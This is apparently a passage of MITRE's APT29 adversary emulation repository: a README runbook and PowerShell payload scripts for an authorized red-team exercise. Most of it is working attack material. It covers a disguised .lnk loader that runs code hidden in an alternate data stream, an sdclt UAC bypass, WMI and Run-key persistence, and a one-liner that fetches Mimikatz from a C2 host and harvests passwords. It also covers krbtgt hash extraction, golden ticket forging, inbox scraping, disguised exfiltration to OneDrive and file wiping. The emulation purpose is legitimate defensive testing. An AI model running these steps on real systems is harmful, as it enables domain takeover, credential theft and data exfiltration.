        }
        else
        {
            // NOTE(review): hExplorerProcess is not closed on this path either.
            printf("[-] Failed to get a handle to EXPLORER.EXE's token: %d\n", GetLastError());
            return 1;
        }
        CloseHandle(hExplorerProcess);
    }
    else
    {
        printf("[-] Failed to get a handle to EXPLORER.EXE's process: %d\n", GetLastError());
        return 1;
    }
    return 0;
}

// Returns the PID of the first process whose image name equals processName (exact,
// case-sensitive std::wstring::compare), or 0 when no match is found or the snapshot
// cannot be taken. The snapshot handle is closed on every return path.
// NOTE(review): the Process32First return value is not checked; if it fails,
// processInfo.szExeFile is uninitialised stack memory when it is compared.
DWORD FindProcessId(const std::wstring& processName)
{
    PROCESSENTRY32 processInfo;
    processInfo.dwSize = sizeof(processInfo); // required by Toolhelp before the first call

    HANDLE processesSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
    if (processesSnapshot == INVALID_HANDLE_VALUE)
        return 0;

    Process32First(processesSnapshot, &processInfo);
    if (!processName.compare(processInfo.szExeFile))
    {
        CloseHandle(processesSnapshot);
        return processInfo.th32ProcessID;
    }

    while (Process32Next(processesSnapshot, &processInfo))
    {
        if (!processName.compare(processInfo.szExeFile))
        {
            CloseHandle(processesSnapshot);
            return processInfo.th32ProcessID;
        }
    }

    CloseHandle(processesSnapshot);
    return 0;
}

-------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 1/payloads/monkey.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/Emulation_Plan/Day 1/payloads/monkey.png --------------------------------------------------------------------------------
/adversary_emulation/APT29/Emulation_Plan/Day 1/payloads/shockwave.local.pfx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/Emulation_Plan/Day 1/payloads/shockwave.local.pfx -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 1/rtlo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/Emulation_Plan/Day 1/rtlo.png -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 2/README.md: -------------------------------------------------------------------------------- 1 | # APT29 Day 2 (Steps 11 through 20) 2 | 3 | ## Acknowledgements 4 | 5 | ### Special thanks to the following public resources: 6 | * Atomic Red Team (https://github.com/redcanaryco/atomic-red-team) 7 | * Mimikatz (https://github.com/gentilkiwi/mimikatz) 8 | * Pinvoke (http://www.pinvoke.net) 9 | * PoshC2 (https://github.com/nettitude/PoshC2) 10 | * POSHSPY (https://github.com/matthewdunwoody/POSHSPY) 11 | * PowerSploit (https://github.com/PowerShellMafia/PowerSploit) 12 | * PSReflect-Functions (https://github.com/jaredcatkinson/PSReflect-Functions) 13 | * State of the Hack S2E01: #NoEasyBreach REVISITED (https://www.fireeye.com/blog/products-and-services/2019/02/state-of-the-hack-no-easy-breach-revisited.html) 14 | * Use PowerShell to Interact with the Windows API (https://devblogs.microsoft.com/scripting/use-powershell-to-interact-with-the-windows-api-part-1) 15 | * Yet another sdclt UAC bypass (http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass) 16 | 17 | ## Overview 18 | 19 | * Emulation of APT29 usage of tools such as PowerDuke, 
POSHSPY, CloudDuke, as well as more recent (2016+) TTPs 20 | * Scenario begins with a target spearphishing leading into a low and slow, methodical approach to owning the initial target and eventually the entire domain 21 | * Includes establishing persistence, credential gathering, local and remote enumeration, and data exfil 22 | * Modular components (ex: PowerShell scripts) may be executed atomically 23 | 24 | ## Requirements 25 | 26 | ### Victim Systems: 27 | 1. 3 targets 28 | * [ ] 1 domain controller and 2 workstations 29 | * [ ] All Windows OS (tested and executed against Win10 1903) 30 | * [ ] Domain joined with at least 2 accounts (domain admin and another user) 31 | 2. Microsoft Outlook must be available locally on one of the victim workstations 32 | 33 | ### Red Team Systems: 34 | 1. Server running an offensive framework (we tested and executed using PoshC2 -- https://github.com/nettitude/PoshC2) capable of: 35 | * [ ] Executing native PowerShell commands 36 | * [ ] Loading and executing PowerShell scripts (.ps1) 37 | * [ ] Generating a DLL payload and an encoded PowerShell oneliner 38 | * [ ] Receiving and maintaining multiple callbacks at once 39 | 2. Online OneDrive Account (https://onedrive.live.com/) 40 | 41 | ## Red Team Setup 42 | 43 | ### Generate an encoded PowerShell oneliner payload, then copy: 44 | 1. Just the encoded portion (ex: `WwBTAH...=`) into `$enc_ps variable` (4th line from bottom) in `schemas.ps1` 45 | * ex: `$enc_ps = "WwBTAH...=="` 46 | 2. The entire value (ex: `powershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAH...=`) into `CommandLineTemplate` variable (under `$ConsumerArgs` in 2nd paragraph) in `stepFifteen_wmi.ps1` 47 | * ex: `CommandLineTemplate="powershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAH...="` 48 | 3. 
The entire value (ex: `powershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAH...=`) into `-Value` variable (2nd line) in `stepFourteen_bypassUAC.ps1` 49 | * ex: `New-Item -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Value "powershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAH...="` 50 | 51 | ### Generate DLL payload, then on a separate Windows host: 52 | 1. [CMD] > `certutil -encode [file].dll blob` 53 | 2. [CMD] > `powershell` 54 | 3. [PS] > `$blob = (Get-Content .\blob) -join ""; $blob > .\blob` 55 | 4. Open `blob` file in text editor 56 | 5. Delete new line at end of file and copy all (CTRL-A, CTRL-C) 57 | 6. Paste value (ex: `-----BEGIN CERTIFICATE-----...-----END CERTIFICATE-----`) into `$bin` variable (6th line) in `schemas.ps1` 58 | 59 | ### Copy payloads to C2 server (wherever is appropriate for your C2 framework to have access to these files) 60 | 61 | ### Update `stepFourteen_credDump.ps1` -- directions are in file 62 | 63 | ### Prepare initial access payloads: 64 | 1. Login as non-domain admin user 65 | 2. Copy over the following files onto the Desktop of the initial victim: 66 | 1. `2016_United_States_presidential_election_-_Wikipedia.html` 67 | 2. `make_lnk.ps1` 68 | 3. `schemas.ps1` 69 | 2. Copy over `MITRE-ATTACK-EVALS.HTML` into the Documents folder of the initial victim 70 | 3. Execute `make_lnk.ps1` (Right click > Run with PowerShell), this will generate `37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk` 71 | 4. Drag `make_lnk.ps1` and `schemas.ps1` to Recycle Bin and empty the Recycle Bin (Right click > Empty Recycle Bin) 72 | 73 | ## Victim Setup 74 | 75 | ### For each of the 3 victims: 76 | 1. Login in as domain admin user 77 | 2. Ensure Windows Defender is off or configured to alert-only (https://support.microsoft.com/en-us/help/4027187/windows-10-turn-off-antivirus-protection-windows-security) 78 | 3. 
Change network type to Domain (https://www.itechtics.com/change-network-type-windows-10/#2-_Setting_network_type_using_Windows_Registry) 79 | 4. Set UAC to never notify (https://articulate.com/support/article/how-to-turn-user-account-control-on-or-off-in-windows-10) 80 | 5. Enable WinRM (https://support.microsoft.com/en-us/help/555966) 81 | 6. Enable UseLogonCredential in the WDigest Registry settings (https://support.microsoft.com/help/2871997/microsoft-security-advisory-update-to-improve-credentials-protection-a) 82 | 83 | ### For the initial victim (the workstation with Microsoft Outlook): 84 | 1. Login as non-domain admin user 85 | 2. Enable programmatic access to Microsoft Outlook (https://www.slipstick.com/developer/change-programmatic-access-options/) 86 | 3. Open Outlook and sign in if necessary 87 | 88 | ## Beginning of Day2 Execution 89 | 90 | ### Step 11 - Initial Breach 91 | 92 | #### 11.A 93 | 94 | 1. As non-domain admin user, execute `37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk` (double click), output will display in terminal 95 | 2. You will now receive a new, low integrity callback 96 | 97 | ### Step 12 - Fortify Access 98 | 99 | #### 12.A 100 | 101 | 1. Load `timestomp.ps1` 102 | 2. Execute `timestomp C:\Users\oscar\AppData\Roaming\Microsoft\kxwn.lock` 103 | 104 | #### 12.B 105 | 106 | 1. Load `stepTwelve.ps1` 107 | 2. Execute `detectav` 108 | 109 | #### 12.C 110 | 111 | 1. Execute `software` 112 | 113 | ### Step 13 - Local Enumeration 114 | 115 | #### 13.A 116 | 117 | 1. Load `stepThirteen.ps1` 118 | 2. Execute `comp` 119 | 120 | #### 13.B 121 | 122 | 1. Execute `domain` 123 | 124 | #### 13.C 125 | 126 | 1. Execute `user` 127 | 128 | #### 13.D 129 | 130 | 1. Execute `pslist` 131 | 132 | ### Step 14 - Elevation 133 | 134 | #### 14.A 135 | 136 | 1. Load `stepFourteen_bypassUAC.ps1` 137 | 2. Execute `bypass` 138 | 3. You will now receive a new, high integrity callback 139 | 140 | #### 14.B 141 | 142 | 1. 
Go to where m.exe is on C2 server in another terminal 143 | 2. Confirm `m.exe` is there and is a Windows PE (`$ file m`) 144 | * `m.exe` is a copy of the Mimikatz executable (available at https://github.com/gentilkiwi/mimikatz) 145 | 3. Host file on port 8080 (`$ sudo python -m SimpleHTTPServer 8080`) 146 | 4. Interact with new callback 147 | 5. Load `stepFourteen_credDump.ps1` 148 | 6. Execute `wmidump` 149 | 7. Kill the python server (CTRL-C) once you see a GET request on the python server (VM terminal) 150 | 151 | ### Step 15 - Establish Persistence 152 | 153 | #### 15.A 154 | 155 | 1. Load `stepFifteen_wmi.ps1` 156 | 2. Execute `wmi` 157 | 158 | **Note:** Do not RDP into the initial access from this point forward, you will trigger callbacks intended for step 20 159 | 160 | ### Step 16 - Lateral Movement 161 | 162 | #### 16.A 163 | 164 | 1. Interact with low integrity callback 165 | 2. Load `powerView.ps1` (available at https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) 166 | 3. Execute `get-netdomaincontroller` 167 | 168 | #### 16.B 169 | 170 | 1. Load `stepSixteen_SID.ps1` 171 | 2. Execute `siduser` 172 | 3. Save the value for the domain SID (ex: `S-1-5-21-2219224806-3979921203-557828661-1110`) and delete the RID (ex: `-1110`) of the end (ex: `S-1-5-21-2219224806-3979921203-557828661`) 173 | 174 | #### 16.C 175 | 176 | 1. Interact with high integrity callback 177 | 2. Load `Invoke-WinRMSession.ps1` (available at https://github.com/nettitude/PoshC2/blob/master/resources/modules/Invoke-WinRMSession.ps1) 178 | 3. Execute `invoke-winrmsession -Username "[insert domain admin username]" -Password "[insert domain admin password]" -IPAddress [insert domain controller IP]` 179 | 4. Output will tell you a session opened and give you the format for using it, ex: 180 | `Session opened, to run a command do the following:` 181 | `Invoke-Command -Session $[session_id] -scriptblock {Get-Process} | out-string` 182 | 5. 
Save the value for the session_id (ex: `$hzaqx`) 183 | 184 | **Note:** If you get an error here, reboot domain controller, then re-run the 2 winrm setup commands before re-executing 16.C 185 | 186 | #### 16.D 187 | 188 | 1. Execute `Copy-Item m.exe -Destination "C:\Windows\System32\" -ToSession $[session_id]` 189 | * `m.exe` is a copy of the Mimikatz executable (available at https://github.com/gentilkiwi/mimikatz) 190 | 2. Execute `Invoke-Command -Session $[session_id] -scriptblock {C:\Windows\System32\m.exe privilege::debug "lsadump::lsa /inject /name:krbtgt" exit} | out-string` 191 | 3. Take note of value for the NTLM hash (ex: `NTLM : f4a688010d80770a55a22893dc6ac510`) near the top (Under RID and User after `* Primary`) 192 | 4. Execute `Get-PSSession | Remove-PSSession` 193 | 194 | ### Step 17 - Collection 195 | 196 | #### 17.A 197 | 198 | 1. Interact with low integrity callback 199 | 2. Load `stepSeventeen_email.ps1` 200 | 3. Execute `psemail` 201 | 202 | #### 17.B 203 | 204 | 1. Interact with high integrity callback 205 | 2. Execute `New-Item -Path "C:\Windows\Temp\" -Name "WindowsParentalControlMigration" -ItemType "directory"` 206 | 3. Execute `Copy-Item "C:\Users\oscar\Documents\MITRE-ATTACK-EVALS.HTML" -Destination "C:\Windows\Temp\WindowsParentalControlMigration"` 207 | 208 | #### 17.C 209 | 210 | 1. Load `stepSeventeen_zip.ps1` 211 | 2. Execute `zip C:\Windows\Temp\WindowsParentalControlMigration.tmp C:\Windows\Temp\WindowsParentalControlMigration` 212 | 213 | ### Step 18 - Exfiltration 214 | 215 | #### 18.A 216 | 217 | 1. Get CID for OneDrive account (https://www.laptopmag.com/articles/map-onedrive-network-drive) 218 | 2. Execute `net use y: https://d.docs.live.net/[CID] /user:[OneDrive account]@outlook.com "[OneDrive password]"` 219 | 3. Execute `Copy-Item "C:\Windows\Temp\WindowsParentalControlMigration.tmp" -Destination "Y:\WindowsParentalControlMigration.tmp"` 220 | 4. 
Login to https://onedrive.live.com/?id=root&cid=[CID] to see exfil (`WindowsParentalControlMigration.tmp`) 221 | 222 | ### Step 19 - Clean UP 223 | 224 | #### 19.A 225 | 226 | 1. Load `wipe.ps1` 227 | 2. Execute `wipe "C:\Windows\System32\m.exe"` 228 | 229 | **Note:** There's a known bug here with ETW (Invoke-ReflectivePEInjection patches a function on the fly that ETW invokes) so callback may die and hang 230 | 231 | #### 19.B 232 | 233 | 1. Execute `wipe "C:\Windows\Temp\WindowsParentalControlMigration.tmp"` 234 | 235 | #### 19.C 236 | 237 | 1. Execute `wipe "C:\Windows\Temp\WindowsParentalControlMigration\MITRE-ATTACK-EVALS.HTML"` 238 | 239 | ### Step 20 - Leverage Persistence 240 | 241 | #### 20.A 242 | 243 | 1. Execute `restart-computer -force` 244 | 2. Existing 2 callbacks should die 245 | 3. RDP and login to initial victim once it reboots 246 | 4. Persistence mechanisms should fire on login (1 for DLL, 1 or more for WMI event subscription) 247 | 248 | **Note:** You may need to repeat login process a few times (close and reopen RDP session) for WMI execute to fire 249 | 250 | #### 20.B 251 | 252 | 1. Interact with the SYSTEM PS callback (from WMI) 253 | 2. Execute `klist purge` 254 | 3. Load `Invoke-Mimikatz.ps1` (available at https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1) 255 | 4. Execute `invoke-mimikatz -command '"kerberos::golden /domain:dmevals.local /sid:[SID] /rc4:[NTLM HASH] /user:mscott /ptt"'` using the SID and NTLM values from earlier 256 | 5. Execute `klist` and confirm ticket is in cache 257 | 6. Execute `Enter-PSSession [hostname of second workstation in domain]` 258 | 7. Execute `Invoke-Command -ComputerName [hostname of second workstation in domain] -ScriptBlock {net user /add toby "pamBeesly<3"}` 259 | 260 | ## Liability / Responsible Usage 261 | 262 | This content is only to be used with appropriate prior, explicit authorization for the purposes of assessing security posture and/or research. 
263 | 264 | ## Notice 265 | 266 | Copyright 2020 The MITRE Corporation 267 | 268 | Approved for Public Release; Distribution Unlimited. Case Number 19-03607-2. 269 | 270 | Licensed under the Apache License, Version 2.0 (the "License"); 271 | you may not use this file except in compliance with the License. 272 | You may obtain a copy of the License at 273 | 274 | http://www.apache.org/licenses/LICENSE-2.0 275 | 276 | Unless required by applicable law or agreed to in writing, software 277 | distributed under the License is distributed on an "AS IS" BASIS, 278 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 279 | See the License for the specific language governing permissions and 280 | limitations under the License. 281 | 282 | This project makes use of ATT&CK® 283 | 284 | [ATT&CK Terms of Use](https://attack.mitre.org/resources/terms-of-use/) 285 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 2/payloads/Invoke-WinRMSession.ps1: -------------------------------------------------------------------------------- 1 | Function Get-RandomName 2 | { 3 | param ( 4 | [int]$Length 5 | ) 6 | $set = 'abcdefghijklmnopqrstuvwxyz'.ToCharArray() 7 | $result = '' 8 | for ($x = 0; $x -lt $Length; $x++) 9 | {$result += $set | Get-Random} 10 | return $result 11 | } 12 | Function Invoke-WinRMSession { 13 | param ( 14 | $username, 15 | $Password, 16 | $IPAddress 17 | ) 18 | $PSS = ConvertTo-SecureString $password -AsPlainText -Force 19 | $getcreds = new-object system.management.automation.PSCredential $username,$PSS 20 | 21 | $randomvar = (Get-RandomName 5) 22 | New-Variable -Name $randomvar -Scope Global -Value (New-PSSession -ComputerName $IPAddress -Credential $getcreds) 23 | $randomvar = "$"+"$randomvar" 24 | Return "`nSession opened, to run a command do the following:`nInvoke-Command -Session $randomvar -scriptblock {Get-Process} | out-string" 25 | 26 | } 
-------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 2/payloads/m: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/Emulation_Plan/Day 2/payloads/m -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 2/payloads/make_lnk.ps1: -------------------------------------------------------------------------------- 1 | $destination = "37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk" 2 | $shell = New-Object -COM WScript.Shell 3 | $shortcut = $shell.CreateShortcut($destination) 4 | $shortcut.TargetPath = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 5 | $shortcut.Arguments = "Get-Content '.\2016_United_States_presidential_election_-_Wikipedia.html' -Stream schemas | IEX" 6 | $shortcut.Description = "The Shocking Truth About Election Rigging in America" 7 | $shortcut.Save() 8 | Add-Content -Path '.\2016_United_States_presidential_election_-_Wikipedia.html' -Value $(Get-Content .\schemas.ps1) -Stream schemas -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 2/payloads/schemas.ps1: -------------------------------------------------------------------------------- 1 | gwmi -namespace root\cimv2 -query "SELECT * FROM Win32_BIOS" 2 | gwmi -namespace root\cimv2 -query "SELECT * FROM Win32_PnPEntity" 3 | gwmi -namespace root\cimv2 -query "Select * from Win32_ComputerSystem" 4 | gwmi -namespace root\cimv2 -query "SELECT * FROM Win32_Process" 5 | (Get-Item -Path ".\" -Verbose).FullName 6 | $bin = "" 7 | $bin | Add-Content -Path blob 8 | certutil -decode blob "$env:appdata\Microsoft\kxwn.lock" 9 | Remove-Item -Path blob 10 | New-ItemProperty -Force -Path 
"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "WebCache" -Value "C:\windows\system32\rundll32.exe $env:appdata\Microsoft\kxwn.lock,VoidFunc" 11 | $enc_ps = "" 12 | $ps = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($enc_ps)) 13 | IEX($ps) 14 | Invoke-Item '2016_United_States_presidential_election_-_Wikipedia.html' -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 2/payloads/stepFifteen_wmi.ps1: -------------------------------------------------------------------------------- 1 | function wmi { 2 | 3 | $FilterArgs = @{name='WindowsParentalControlMigration'; 4 | EventNameSpace='root\CimV2'; 5 | QueryLanguage="WQL"; 6 | Query = "SELECT * FROM __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_LoggedOnUser' AND TargetInstance.__RELPATH like '%$($env:UserName)%'";} 7 | $Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs 8 | 9 | $ConsumerArgs = @{name='WindowsParentalControlMigration'; 10 | CommandLineTemplate="";} 11 | $Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs 12 | 13 | $FilterToConsumerArgs = @{ 14 | Filter = [Ref] $Filter 15 | Consumer = [Ref] $Consumer 16 | } 17 | $FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs 18 | } -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 2/payloads/stepFourteen_bypassUAC.ps1: -------------------------------------------------------------------------------- 1 | # This code was derived from http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass 2 | 3 | function bypass { 4 | New-Item -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Value "" 5 | New-ItemProperty -Force -Path 
"HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute" 6 | Start-Process -FilePath $env:windir\system32\sdclt.exe 7 | Start-Sleep -s 3 8 | Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse 9 | } -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 2/payloads/stepFourteen_credDump.ps1: -------------------------------------------------------------------------------- 1 | # This code was derived from https://www.fireeye.com/blog/products-and-services/2019/02/state-of-the-hack-no-easy-breach-revisited.html 2 | 3 | function wmidump { 4 | $newClass = New-Object System.Management.ManagementClass("root\cimv2", [String]::Empty, $null) 5 | $newClass["__CLASS"] = "Win32_AuditCode" 6 | $newClass.Qualifiers.Add("Static", $true) 7 | $newClass.Properties.Add("Code", [System.Management.CimType]::String, $false) 8 | $newClass.Properties["Code"].Qualifiers.Add("key", $true) 9 | $newClass.Properties["Code"].Value = "" 10 | $newClass.Properties.Add("Result", [System.Management.CimType]::String, $false) 11 | $newClass.Properties["Result"].Qualifiers.Add("Key", $true) 12 | $newClass.Properties["Result"].Value = "" 13 | $newClass.Put() 14 | Start-Sleep -s 5 15 | $p = [wmiclass]"\\.\root\cimv2:Win32_Process" 16 | $s = [wmiclass]"\\.\root\cimv2:Win32_ProcessStartup" 17 | $s.Properties['ShowWindow'].value=$false 18 | $code = ([wmiclass]"\\.\root\cimv2:Win32_AuditCode").Properties["Code"].value 19 | $p.Create("powershell.exe -enc $code") 20 | $ps = Get-Process powershell | select starttime,id | Sort-Object -Property starttime | select -last 1 | select -expandproperty id 21 | Get-Process powershell | select starttime,id 22 | $ps 23 | Wait-Process -Id $ps 24 | $EncodedText = Get-WmiObject -Class Win32_AuditCode -NameSpace "root\cimv2" | Select -ExpandProperty Result 25 | $DecodedText = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($EncodedText)) 26 | Return 
$DecodedText 27 | 28 | # Update the C2 IP value below then encode the command using https://raikia.com/tool-powershell-encoder/ 29 | # Paste encoded output into quote on line 7 -- $newClass.Properties["Code"].Value = "[Here]" 30 | # $wc = New-Object System.Net.WebClient; $wc.DownloadFile("http://[C2 IP]:8080/m","m.exe"); $ProcessInfo = New-Object System.Diagnostics.ProcessStartInfo; $ProcessInfo.FileName = "m.exe"; $ProcessInfo.RedirectStandardError = $true; $ProcessInfo.RedirectStandardOutput = $true; $ProcessInfo.UseShellExecute = $false; $ProcessInfo.Arguments = @("privilege::debug","sekurlsa::logonpasswords","exit"); $Process = New-Object System.Diagnostics.Process; $Process.StartInfo = $ProcessInfo; $Process.Start() | Out-Null; $output = $Process.StandardOutput.ReadToEnd(); $Pws = ""; ForEach ($line in $($output -split "`r`n")) {if ($line.Contains('Password') -and ($line.length -lt 50)) {$Pws += $line}}; $PwBytes = [System.Text.Encoding]::Unicode.GetBytes($Pws); $EncPws =[Convert]::ToBase64String($PwBytes); Set-WmiInstance -Path \\.\root\cimv2:Win32_AuditCode -Argument @{Result=$EncPws} 31 | 32 | # Note: Running this script multiple times on the same victim may fail unless you delete the created WMI Class 33 | } -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 2/payloads/stepSeventeen_email.ps1: -------------------------------------------------------------------------------- 1 | # This code was derived from https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/Get-Inbox.ps1 2 | 3 | function psemail { 4 | Add-type -assembly "Microsoft.Office.Interop.Outlook" | out-null 5 | $olFolders = "Microsoft.Office.Interop.Outlook.olDefaultFolders" -as [type] 6 | $outlook = new-object -comobject outlook.application 7 | $namespace = $outlook.GetNameSpace("MAPI") 8 | $folder = $namespace.getDefaultFolder($olFolders::olFolderInBox) 9 | $folder.items | Select-Object -Property 
Subject, ReceivedTime, SenderName, Body 10 | } -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 2/payloads/stepSeventeen_zip.ps1: -------------------------------------------------------------------------------- 1 | # This code was derived from https://github.com/matthewdunwoody/POSHSPY 2 | 3 | function zip( $zipfilename, $sourcedir ) 4 | { 5 | Add-Type -Assembly System.IO.Compression.FileSystem 6 | $compressionLevel = [System.IO.Compression.CompressionLevel]::Optimal 7 | [System.IO.Compression.ZipFile]::CreateFromDirectory($sourcedir, $zipfilename, $compressionLevel, $false) 8 | Start-Sleep -s 3 9 | $fileContent = get-content $zipfilename 10 | $fileContentBytes = [System.Text.Encoding]::UTF8.GetBytes($fileContent) 11 | $fileContentEncoded = [System.Convert]::ToBase64String($fileContentBytes) 12 | $fileContentEncoded | set-content $zipfilename 13 | [Byte[]] $x = 0x47,0x49,0x46,0x38,0x39,0x61 14 | $save = get-content $zipfilename 15 | $x | set-content $zipfilename -Encoding Byte 16 | add-content $zipfilename $save 17 | } -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 2/payloads/stepThirteen.ps1: -------------------------------------------------------------------------------- 1 | # This code was derived from http://www.pinvoke.net 2 | 3 | function comp { 4 | $Signature=@" 5 | [DllImport("kernel32.dll", SetLastError=true, CharSet=CharSet.Auto)] 6 | static extern bool GetComputerNameEx(COMPUTER_NAME_FORMAT NameType,string lpBuffer, ref uint lpnSize); 7 | enum COMPUTER_NAME_FORMAT 8 | {ComputerNameNetBIOS,ComputerNameDnsHostname,ComputerNameDnsDomain,ComputerNameDnsFullyQualified,ComputerNamePhysicalNetBIOS,ComputerNamePhysicalDnsHostname,ComputerNamePhysicalDnsDomain,ComputerNamePhysicalDnsFullyQualified} 9 | public static string GCN() { 10 | bool success; 11 | string name = " "; 12 | uint size = 20; 13 | success = 
GetComputerNameEx(COMPUTER_NAME_FORMAT.ComputerNameNetBIOS, name, ref size); 14 | return "NetBIOSName:\t" + name.ToString(); 15 | } 16 | "@ 17 | Add-Type -MemberDefinition $Signature -Name GetCompNameEx -Namespace Kernel32 18 | $result = [Kernel32.GetCompNameEx]::GCN() 19 | return $result 20 | } 21 | function domain { 22 | $Signature=@" 23 | [DllImport("netapi32.dll", SetLastError=true)] 24 | public static extern int NetWkstaGetInfo(string servername, int level, out IntPtr bufptr); 25 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] 26 | public struct WKSTA_INFO_100 { 27 | public int platform_id; 28 | public string computer_name; 29 | public string lan_group; 30 | public int ver_major; 31 | public int ver_minor; 32 | } 33 | public static string NWGI() 34 | { 35 | string host = null; 36 | IntPtr buffer; 37 | var ret = NetWkstaGetInfo(host, 100, out buffer); 38 | var strut_size = Marshal.SizeOf(typeof (WKSTA_INFO_100)); 39 | WKSTA_INFO_100 wksta_info; 40 | wksta_info = (WKSTA_INFO_100) Marshal.PtrToStructure(buffer, typeof (WKSTA_INFO_100)); 41 | string domainName = wksta_info.lan_group; 42 | return "DomainName:\t" + domainName.ToString(); 43 | } 44 | "@ 45 | Add-Type -MemberDefinition $Signature -Name NetWGetInfo -Namespace NetAPI32 46 | $result = [NetAPI32.NetWGetInfo]::NWGI() 47 | return $result 48 | } 49 | function user { 50 | $Signature=@" 51 | [DllImport("secur32.dll", CharSet=CharSet.Auto, SetLastError=true)] 52 | public static extern int GetUserNameEx (int nameFormat, string userName, ref int userNameSize); 53 | public static string GUN() { 54 | string uname = " "; 55 | int size = 40; 56 | int EXTENDED_NAME_FORMAT_NAME_DISPLAY = 2; 57 | string ret = ""; 58 | if(0 != GetUserNameEx(EXTENDED_NAME_FORMAT_NAME_DISPLAY, uname, ref size)) 59 | { 60 | ret += "UserName:\t" + uname.ToString(); 61 | } 62 | return ret; 63 | } 64 | "@ 65 | Add-Type -MemberDefinition $Signature -Name GetUNameEx -Namespace Secur32 66 | $result = [Secur32.GetUNameEx]::GUN() 
67 | return $result 68 | } 69 | function pslist { 70 | $Signature=@" 71 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)] 72 | private struct PROCESSENTRY32 73 | { 74 | const int MAX_PATH = 260; 75 | internal UInt32 dwSize; 76 | internal UInt32 cntUsage; 77 | internal UInt32 th32ProcessID; 78 | internal IntPtr th32DefaultHeapID; 79 | internal UInt32 th32ModuleID; 80 | internal UInt32 cntThreads; 81 | internal UInt32 th32ParentProcessID; 82 | internal Int32 pcPriClassBase; 83 | internal UInt32 dwFlags; 84 | [MarshalAs(UnmanagedType.ByValTStr, SizeConst = MAX_PATH)] 85 | internal string szExeFile; 86 | } 87 | [DllImport("kernel32", SetLastError = true, CharSet = System.Runtime.InteropServices.CharSet.Auto)] 88 | static extern IntPtr CreateToolhelp32Snapshot([In]UInt32 dwFlags, [In]UInt32 th32ProcessID); 89 | 90 | [DllImport("kernel32", SetLastError = true, CharSet = System.Runtime.InteropServices.CharSet.Auto)] 91 | static extern bool Process32First([In]IntPtr hSnapshot, ref PROCESSENTRY32 lppe); 92 | 93 | [DllImport("kernel32", SetLastError = true, CharSet = System.Runtime.InteropServices.CharSet.Auto)] 94 | static extern bool Process32Next([In]IntPtr hSnapshot, ref PROCESSENTRY32 lppe); 95 | 96 | [DllImport("kernel32", SetLastError = true)] 97 | [return: MarshalAs(UnmanagedType.Bool)] 98 | private static extern bool CloseHandle([In] IntPtr hObject); 99 | 100 | public static string CT32S() { 101 | IntPtr hProcessSnap = CreateToolhelp32Snapshot(0x00000002, 0); 102 | PROCESSENTRY32 procEntry = new PROCESSENTRY32(); 103 | procEntry.dwSize = (UInt32)Marshal.SizeOf(typeof(PROCESSENTRY32)); 104 | string ret = ""; 105 | if (Process32First(hProcessSnap, ref procEntry)) 106 | { 107 | do 108 | { 109 | ret += (procEntry.th32ProcessID).ToString() + "\t" + (procEntry.szExeFile).ToString() + "\n"; 110 | } while (Process32Next(hProcessSnap, ref procEntry)); 111 | } 112 | CloseHandle(hProcessSnap); 113 | return ret; 114 | } 115 | "@ 116 | Add-Type -MemberDefinition 
